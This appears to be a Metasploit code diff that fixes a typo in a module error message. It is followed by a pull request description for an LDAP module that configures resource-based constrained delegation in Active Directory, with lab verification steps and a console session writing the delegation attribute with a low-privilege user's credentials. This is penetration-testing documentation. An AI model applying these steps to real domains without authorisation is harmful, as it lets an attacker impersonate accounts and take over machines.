@@ -469,7 +450,7 @@ class MetasploitModule < Msf::Auxiliary
         case action.name
         when 'RUN_QUERY_FILE'
           unless datastore['QUERY_FILE_PATH']
-            fail_with(Failure::BadConfig, 'When using the RUN_QUERY_FILE action, one must specify the path to the JASON/YAML file containing the queries via QUERY_FILE_PATH!')
+            fail_with(Failure::BadConfig, 'When using the RUN_QUERY_FILE action, one must specify the path to the JSON/YAML file containing the queries via QUERY_FILE_PATH!')
           end
           print_status("Loading queries from #{datastore['QUERY_FILE_PATH']}...")
 


### PR DESCRIPTION
Role Based Constrained Delegation (RBCD) is the means by which an object in Active Directory (DELEGATE_TO) can be configured to permit another object (DELEGATE_FROM) to impersonate any other account. If you're not familiar with RBCD, I highly recommend reading [this detailed guide](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution) from the references.  Following this guide, Metasploit can be used to create a computer account and configure RBCD. It is not necessary to have a second workstation (WS02) unless you want to run Rubeus and follow through to actually use the new RBCD configuration. WS02 isn't necessary because Metasploit replaces it.

This PR includes duplicate code from #17122. I actually shared the MsDtyp data definitions with @gwillcox-r7 while this was in progress because he needed them as well. Which ever of the two is landed second will need to be rebased.

## Verification

List the steps needed to make sure this thing works

- [ ] Setup a Domain controller and a workstation, join the workstation to the domain (it'll be referred to as WS01$ in the remaining sections)
- [ ] Create a normal domain user, no additional privileges (this will be referred to as `sandy` in the remaining steps)
- [ ] Using Active Directory, grant sandy write permissions to the WS01$ object. The tab may not be present unless advanced features are enabled, go to `View > Advanced Features`. See [this section](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution#modifying-target-computers-ad-object) for more information.
- [ ] Test that the module works
  - [ ] Set the `RHOST` value to a target domain controller
  - [ ] Set the `BIND_DN` and `BIND_PW` information to an account with the necessary privileges
  - [ ] Set the `DELEGATE_TO` and `DELEGATE_FROM` data store options
  - [ ] Use the `WRITE` action to configure the target for RBCD
  - [ ] Use the `READ` action to confirm that RBCD has been configured correct
  - [ ] Use the `REMOVE` action to delete the ACE, re-use READ to confirm that the ACL is present but is empty
  - [ ] Use the `FLUSH` action to completely remove the security descriptor


## Example
```
msf6 auxiliary(admin/ldap/rbcd) > set BIND_DN sandy@msflab.local
BIND_DN => sandy@msflab.local
msf6 auxiliary(admin/ldap/rbcd) > set BIND_PW Password1!
BIND_PW => Password1!
msf6 auxiliary(admin/ldap/rbcd) > set RHOSTS 192.168.159.10
RHOSTS => 192.168.159.10
msf6 auxiliary(admin/ldap/rbcd) > set DELEGATE_TO WS01$
DELEGATE_TO => WS01$
msf6 auxiliary(admin/ldap/rbcd) > read
[*] Running module against 192.168.159.10

[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local
[*] The msDS-AllowedToActOnBehalfOfOtherIdentity field is empty.
[*] Auxiliary module execution completed
msf6 auxiliary(admin/ldap/rbcd) > set DELEGATE_FROM DESKTOP-QLSTR9NW$
DELEGATE_FROM => DESKTOP-QLSTR9NW$
msf6 auxiliary(admin/ldap/rbcd) > write
[*] Running module against 192.168.159.10

[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local
[+] Successfully created the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
[*] Auxiliary module execution completed
msf6 auxiliary(admin/ldap/rbcd) > read
[*] Running module against 192.168.159.10

[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local
[*] Allowed accounts:
[*]   DESKTOP-QLSTR9NW$ (S-1-5-21-3402587289-1488798532-3618296993-1655)
[*] Auxiliary module execution completed
msf6 auxiliary(admin/ldap/rbcd) > 
```